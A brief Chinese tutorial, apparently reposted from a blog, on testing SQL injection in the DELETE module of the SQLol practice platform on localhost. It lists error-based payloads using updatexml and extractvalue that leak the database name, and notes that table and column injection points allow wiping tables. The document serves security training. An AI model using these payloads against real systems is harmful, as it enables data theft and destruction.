SQL注入测试平台 SQLol -5.DELETE注入测试

　　访问首页的delete模块，http://127.0.0.1/sql/delete.php，开始对delete模块进行测试。

delete语法：

DELETE FROM 【users】 WHERE 【username】 = 【‘1‘】

几个位置都可能存在注入，这里只演示一种。

下面演示注入到不同位置的方法。

一、String in WHERE clause

构造POC：

‘ or updatexml(1,concat(0x7e,(database()),0x7e),0) or ‘

获取数据库

二、Integer in WHERE clause

构造POC:

‘‘ or extractvalue(1,concat(0x7e,database())) or ‘‘

获取数据库

三、Column Name

注入点在【1】处

DELETE FROM users WHERE 【1】 = 1 

利用方式：

1、清空users表

2、构造报错注入语句

四、Table Name

注入点在【1】处

DELETE FROM 1 WHERE isadmin = 0 

利用方式：

1、清空任意表

2、构造报错，爆出数据

SQL注入测试平台 SQLol -5.DELETE注入测试

原文：http://www.cnblogs.com/xiaozi/p/5532657.html